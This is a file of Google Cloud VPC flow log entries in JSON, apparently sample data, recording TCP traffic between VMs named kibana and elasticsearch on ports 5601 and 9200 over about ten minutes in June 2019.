-{"insertId":"bnj3cofh3cdju","jsonPayload":{"bytes_sent":"66736","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.134","src_port":33554},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565131125Z","packets_sent":"366","reporter":"DEST","rtt_msec":"224","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:02.143837873Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnet
work_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} -{"insertId":"bnj3cofh3cdjz","jsonPayload":{"bytes_sent":"1776","connection":{"dest_ip":"198.51.100.107","dest_port":33602,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:45:51.090104692Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:45:50.954948790Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} -{"insertId":"bnj3cofh3cdkk","jsonPayload":{"bytes_sent":"1464","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"203.0.113.27","src_port":52454},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:42:40.888804332Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:42:40.779893091Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} 
-{"insertId":"bnj3cofh3cdk0","jsonPayload":{"bytes_sent":"259510","connection":{"dest_ip":"10.87.40.76","dest_port":33534,"protocol":6,"src_ip":"198.51.100.248","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.597279654Z","packets_sent":"251","reporter":"DEST","rtt_msec":"2","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:06.075756033Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} 
-{"insertId":"bnj3cofh3cdk8","jsonPayload":{"bytes_sent":"1781","connection":{"dest_ip":"203.0.113.27","dest_port":52260,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:42:11.183868408Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:42:11.063146265Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} -{"insertId":"bnj3cofh3cdkp","jsonPayload":{"bytes_sent":"65069","connection":{"dest_ip":"198.51.100.248","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33530},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565300944Z","packets_sent":"361","reporter":"SRC","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:00.140119099Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_na
me":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} -{"insertId":"bnj3cofh3cdkc","jsonPayload":{"bytes_sent":"60530","connection":{"dest_ip":"198.51.100.248","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33556},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565335113Z","packets_sent":"366","reporter":"SRC","rtt_msec":"15","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.500498059Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} 
-{"insertId":"bnj3cofh3cdkm","jsonPayload":{"bytes_sent":"11384","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.134","src_port":33570},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821047175Z","packets_sent":"86","reporter":"DEST","rtt_msec":"230","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.469473010Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} 
-{"insertId":"bnj3cofh3cdjy","jsonPayload":{"bytes_sent":"272063","connection":{"dest_ip":"203.0.113.134","dest_port":33554,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565131125Z","packets_sent":"247","reporter":"SRC","rtt_msec":"224","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:02.143837873Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} 
-{"insertId":"bnj3cofh3cdjv","jsonPayload":{"bytes_sent":"1791","connection":{"dest_ip":"203.0.113.27","dest_port":53706,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:43:50.822333871Z","packets_sent":"7","reporter":"SRC","rtt_msec":"43","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:43:50.703302550Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"}
-{"insertId":"bnj3cofh3cdkh","jsonPayload":{"bytes_sent":"18295","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.134","src_port":33858},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.789039435Z","packets_sent":"118","reporter":"DEST","rtt_msec":"253","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.458515996Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork
_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"}
-{"insertId":"bnj3cofh3cdkg","jsonPayload":{"bytes_sent":"1467","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"198.51.100.107","src_port":33064},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:44:40.243022993Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:44:40.125336665Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"}
-{"insertId":"bnj3cofh3cdk7","jsonPayload":{"bytes_sent":"165290","connection":{"dest_ip":"10.87.40.76","dest_port":33556,"protocol":6,"src_ip":"198.51.100.248","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565335113Z","packets_sent":"251","reporter":"DEST","rtt_msec":"15","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.500498059Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} 
-{"insertId":"bnj3cofh3cdk9","jsonPayload":{"bytes_sent":"1458","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"203.0.113.27","src_port":53706},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:43:50.822333871Z","packets_sent":"7","reporter":"DEST","rtt_msec":"43","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:43:50.703302550Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"}
-{"insertId":"bnj3cofh3cdkj","jsonPayload":{"bytes_sent":"1464","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"203.0.113.27","src_port":52260},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:42:11.183868408Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:42:11.063146265Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"}
-{"insertId":"bnj3cofh3cdki","jsonPayload":{"bytes_sent":"1780","connection":{"dest_ip":"203.0.113.27","dest_port":34090,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:46:37.827345444Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:46:37.712749588Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"}
-{"insertId":"bnj3cofh3cdkd","jsonPayload":{"bytes_sent":"1780","connection":{"dest_ip":"203.0.113.12","dest_port":34178,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:46:51.355687385Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:46:51.237256499Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"}
-{"insertId":"bnj3cofh3cdjw","jsonPayload":{"bytes_sent":"1776","connection":{"dest_ip":"198.51.100.107","dest_port":33064,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:44:40.243022993Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:44:40.125336665Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"}
-{"insertId":"bnj3cofh3cdk3","jsonPayload":{"bytes_sent":"1461","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"198.51.100.107","src_port":34906},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:48:50.757255245Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:48:50.642206049Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"}
-{"insertId":"bnj3cofh3cdkb","jsonPayload":{"bytes_sent":"1781","connection":{"dest_ip":"203.0.113.12","dest_port":58216,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:49:36.982303071Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:49:36.865198297Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"}
-{"insertId":"bnj3cofh3cdk4","jsonPayload":{"bytes_sent":"60222","connection":{"dest_ip":"198.51.100.248","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33534},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.597279654Z","packets_sent":"361","reporter":"SRC","rtt_msec":"2","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:06.075756033Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_na
me":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"}
-{"insertId":"bnj3cofh3cdkf","jsonPayload":{"bytes_sent":"61810","connection":{"dest_ip":"198.51.100.248","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33510},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565335113Z","packets_sent":"358","reporter":"SRC","rtt_msec":"16","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.500418290Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"}
-{"insertId":"bnj3cofh3cdkl","jsonPayload":{"bytes_sent":"1467","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"203.0.113.12","src_port":58216},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:36.982303071Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:49:36.865198297Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"}
-{"insertId":"bnj3cofh3cdk2","jsonPayload":{"bytes_sent":"136558","connection":{"dest_ip":"10.87.40.76","dest_port":33510,"protocol":6,"src_ip":"198.51.100.248","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565335113Z","packets_sent":"243","reporter":"DEST","rtt_msec":"16","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.500418290Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwor
k_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"}
-{"insertId":"bnj3cofh3cdko","jsonPayload":{"bytes_sent":"1781","connection":{"dest_ip":"198.51.100.107","dest_port":34906,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:48:50.757255245Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:48:50.642206049Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"}
-{"insertId":"bnj3cofh3cdke","jsonPayload":{"bytes_sent":"1781","connection":{"dest_ip":"203.0.113.27","dest_port":52454,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:42:40.888804332Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:42:40.779893091Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"}
-{"insertId":"bnj3cofh3cdka","jsonPayload":{"bytes_sent":"1467","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"203.0.113.27","src_port":34090},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:46:37.827345444Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:46:37.712749588Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"}
-{"insertId":"bnj3cofh3cdkn","jsonPayload":{"bytes_sent":"170396","connection":{"dest_ip":"10.87.40.76","dest_port":33530,"protocol":6,"src_ip":"198.51.100.248","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565300944Z","packets_sent":"246","reporter":"DEST","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:00.140119099Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork
_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"}
-{"insertId":"bnj3cofh3cdk5","jsonPayload":{"bytes_sent":"171610","connection":{"dest_ip":"203.0.113.134","dest_port":33570,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821129119Z","packets_sent":"71","reporter":"SRC","rtt_msec":"230","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.469473010Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"}
